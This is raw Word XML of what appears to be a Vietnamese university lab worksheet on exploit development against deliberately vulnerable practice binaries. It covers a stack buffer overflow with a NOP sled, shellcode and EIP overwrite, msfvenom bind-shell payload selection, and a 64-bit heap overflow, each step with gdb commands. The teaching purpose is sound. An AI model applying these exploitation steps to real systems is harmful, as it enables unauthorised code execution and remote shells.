      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Thực thi các lệnh này để chạy khai thác trong trình gỡ lỗi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>chmod a+x ex1 gdb -q ED3a run $(./ex1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FFEBC1" w14:textId="1C22BDA2" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="567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55DCE" wp14:editId="08FEE891">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20496271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D91" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Thực thi lệnh này, lệnh này hiển thị các khai thác có sẵn cho nền tảng Linux, liên kết một trình bao với một cổng TCP đang nghe: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E550797" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="104" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="2170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sudo msfvenom -l payloads | grep linux | grep bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F11059E" w14:textId="232EF1A8" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567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9B2A4" wp14:editId="74E825CC">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3229019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F78" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Khai thác chúng tôi muốn được đánh dấu ở trên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linux / x86 / shell_bind_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE05BD" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Để xem các tùy chọn tải trọng, hãy thực hiện lệnh này </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F17E1" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:right="1251"/>
        <w:jc w:val="right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sudo msfvenom -p linux/x86/shell_bind_tcp --list-options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F23BBA6" w14:textId="5E27A9B0" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567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88232" wp14:editId="4407A8EB">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5745703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AFE4" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Xây dựng Khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82767A" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:right="1231"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Trong CỬA SỔ MÁY CHỦ, thực hiện lệnh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nano ex2 #!/usr/bin/python nopsled = '\x90' * 500 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707E615" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610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suffix = 'A' * (1012 - len(nopsled) - len(buf)) eip = '1234' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512A393" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610" w:right="1482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attack = nopsled + buf + suffix + eip print attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A0044" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="9" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="1231"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Thực thi các lệnh này để làm cho chương trình có thể thực thi và chạy nó.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chmod +x ex2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B88FD94" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="00BB4DA8">
      <w:pPr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./ex2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174FE8A" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="43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Chương trình chạy, in ra một chuỗi dài các ký tự kết thúc bằng "1234"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055E401" w14:textId="3293212F" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="916"/>
        <w:ind w:left="567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3DCBB" wp14:editId="7F6E42DA">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10925729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B51B" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Tìm NOP Sled trong RAM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8B63C" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Trong cửa sổ Terminal, thực hiện các lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3E513" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="3719" w:firstLine="324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gdb -q ED3a disassemble copier </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Mã chạy đến điểm ngắt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>break * 0x08049241 run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97FC78" w14:textId="7EC2D9CF" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="567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51A1C1" wp14:editId="2EF4C675">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15841885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5704" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Tìm NOP Sled trong RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C022F9" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Trong cửa số Terminal, thực hiện các lệnh sao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gdb -q ED3a disassemble copier </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mã chạy đến điểm ngắt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A8139" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="3610" w:right="3389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break * 0x08049241 run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C4E95" w14:textId="564C3756" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="335"/>
        <w:ind w:left="567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E04E5" wp14:editId="6E222510">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2633857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9308" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Xem khung xếp chồng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522858C5" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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lastRenderedPageBreak/>
        <w:t>Trong gdb, thực hiện lệnh này để xem các thanh ghi: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 info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2669D" w14:textId="5E5B0D8B" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="567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12E2F" wp14:editId="5D5DAF7D">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4843784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8833" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Trong gdb, thực hiện lệnh này để xem khung ngăn xếp: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 xml:space="preserve"> x/410x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280ED69" w14:textId="21470A89" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="0088200F">
      <w:pPr>
        <w:ind w:left="-2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5B661" wp14:editId="16B29DD5">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16597853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A9A9" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Hoàn thành mã khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B19B466" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Thực hiện các lệnh này để sao chép chương trình vào một tệp mới và chỉnh sửa nó.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>cp ex2 ex3 nano ex3 gdb -q ED3a run $(./ex3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542A9E7F" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr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20F4848" w14:textId="066E9624" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="327"/>
        <w:ind w:left="-2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2A3664" wp14:editId="0878A084">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16390239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92FA" w14:textId="669ADBFD" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="00992DD4" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="-2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AD39A" wp14:editId="01ED523D">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15274992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49BB" w14:textId="77777777" w:rsidR="0088200F" w:rsidRPr="00BB4DA8" w:rsidRDefault="0088200F" w:rsidP="0088200F">
      <w:pPr>
        <w:spacing w:after="297" w:line="267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2.2. Thực hiện hướng dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8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ED 203.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>không bắt buộc, sinh viên sẽ 25% điểm thưởng cho bài thực hành nếu hoàn thành</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8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</w:p>
    <w:p w14:paraId="626F092B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BF9FF8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68D5C5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DB6E4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4082A1" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147A7AB3" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5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lastRenderedPageBreak/>
        <w:t>Câu 3: Khai thác lỗi Heap-based Buffer Overflow trên Linux 64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1E05F" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="9" w:line="27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3.1. Tham khảo hướng dẫn khai thác lỗi Heap-based buffer overflow  link bên dưới. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA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Chụp hình minh hoạ chiếm được shell sau khi hoàn thành mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ED 205.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA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trong hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC970F4" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="14" w:line="267" w:lineRule="auto"/>
        <w:ind w:left="730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color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://samsclass.info/127/proj/ED205c.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF35AE" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00363ED1" wp14:editId="76C636A7">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1845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2369" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664A4CC2" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Xem mã nguồn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F919B" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567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45443" wp14:editId="33AC5F06">
            <wp:extent cx="5943600" cy="3241675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1928287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CD10" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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lastRenderedPageBreak/>
        <w:t>Quan sát đóng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94ABEB" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49087439" wp14:editId="60C654B4">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1634967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0654" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C38196" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="4" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="933" w:hanging="1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0x400629 trên hệ thống x/130x 0x804b000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F0C64" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F752A6" wp14:editId="7861F379">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20079165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3B4F" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723F1D83" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="313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Tìm chức năng “nowinner”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>disassemble nowinner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5C264B" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="571"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A365B75" wp14:editId="23F7E6E7">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="189513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0741" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:spacing w:after="907"/>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC113C3" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E4A819" wp14:editId="132C424B">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5064195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2729" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458B2B88" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="33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lastRenderedPageBreak/>
        <w:t>Sửa đổi tệp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711DFDE" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr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>#!/usr/bin/python print 'A' * 70 + '00112233445566778899'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C60ADC" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="357" w:line="275" w:lineRule="auto"/>
        <w:ind w:right="2400"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Gỡ lỗi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>gdb -q ./ED205 run $(./h2) info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B7123" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F48EBF" wp14:editId="20CDD334">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4716404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360A" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:ind w:left="-2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5535EDE1" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="71" w:line="270" w:lineRule="auto"/>
        <w:ind w:right="2400"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Sửa đổi tệp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3BF30" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00BB4DA8">
      <w:pPr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#!/usr/bin/python print 'A' * 80 + '1234' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA3DDF" w14:textId="77777777" w:rsidR="00CE3844" w:rsidRPr="00BB4DA8" w:rsidRDefault="00CE3844" w:rsidP="00CE3844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="1" w:line="275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Gỡ lỗi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>gdb -q ./ED205 run $(./h3) info registers</w:t>
      </w:r>
    </w:p>
